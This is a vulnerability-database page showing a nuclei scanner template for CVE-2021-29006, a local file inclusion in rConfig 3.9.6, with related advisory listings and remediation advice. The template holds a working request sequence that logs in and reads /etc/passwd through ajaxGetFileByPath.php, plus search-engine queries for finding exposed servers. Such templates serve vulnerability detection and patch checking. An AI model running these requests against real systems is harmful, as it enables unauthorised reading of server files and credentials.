Lucene search
K

rConfig 3.9.6 - Local File Inclusion

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 20 Views

rConfig 3.9.6 Local File Inclusion Vulnerabilit

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2021-29006
11 Oct 202116:23
circl
CNNVD
rConfig 信息泄露漏洞
11 Oct 202100:00
cnnvd
CNVD
rConfig Information Disclosure Vulnerability (CNVD-2021-99276)
12 Oct 202100:00
cnvd
CVE
CVE-2021-29006
11 Oct 202112:02
cve
Cvelist
CVE-2021-29006
11 Oct 202112:02
cvelist
NVD
CVE-2021-29006
11 Oct 202113:15
nvd
OpenVAS
rConfig <= 3.x Multiple Vulnerabilities
6 Dec 202200:00
openvas
OSV
CVE-2021-29006
11 Oct 202113:15
osv
Prion
Arbitrary file deletion
11 Oct 202113:15
prion
RedhatCVE
CVE-2021-29006
22 May 202519:35
redhatcve
Rows per page
id: CVE-2021-29006

info:
  name: rConfig 3.9.6 - Local File Inclusion
  author: r3Y3r53
  severity: medium
  description: |
    rConfig 3.9.6 is affected by a Local File Disclosure vulnerability. An authenticated user may successfully download any file on the server.
  impact: |
    Authenticated attackers can read arbitrary files from the server including /etc/passwd, potentially exposing sensitive system information and credentials.
  remediation: |
    Upgrade to rConfig version 3.9.7 or later.
  reference:
    - https://github.com/mrojz/rconfig-exploit/blob/main/CVE-2021-29006-POC.py
    - https://nvd.nist.gov/vuln/detail/CVE-2021-29006
    - http://rconfig.com
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2021-29006
    cwe-id: CWE-22
    epss-score: 0.06976
    epss-percentile: 0.93357
    cpe: cpe:2.3:a:rconfig:rconfig:3.9.6:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: rconfig
    product: rconfig
    shodan-query:
      - http.title:"rConfig"
      - http.title:"rconfig"
    fofa-query: title="rconfig"
    google-query: intitle:"rconfig"
  tags: cve2021,cve,rconfig,authenticated,lfi,vuln

http:
  - raw:
      - |
        POST /lib/crud/userprocess.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user={{username}}&pass={{password}}&sublogin=1
      - |
        GET /dashboard.php HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /lib/ajaxHandlers/ajaxGetFileByPath.php?path=/etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body_3
        regex:
          - 'root:.*:0:0:'

      - type: word
        part: body_2
        words:
          - 'rconfig'

      - type: status
        part: header_3
        status:
          - 200
# digest: 4b0a00483046022100a7cee11fa6c895721ae4f73c4dc4d91137a7e3bd54fe72050eef35759d1506d5022100d731e7c70fb21974e9b385716483dbef94b8e4d6acb1443361b957d12340c874:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 24
CVSS 3.16.5
EPSS0.06976
20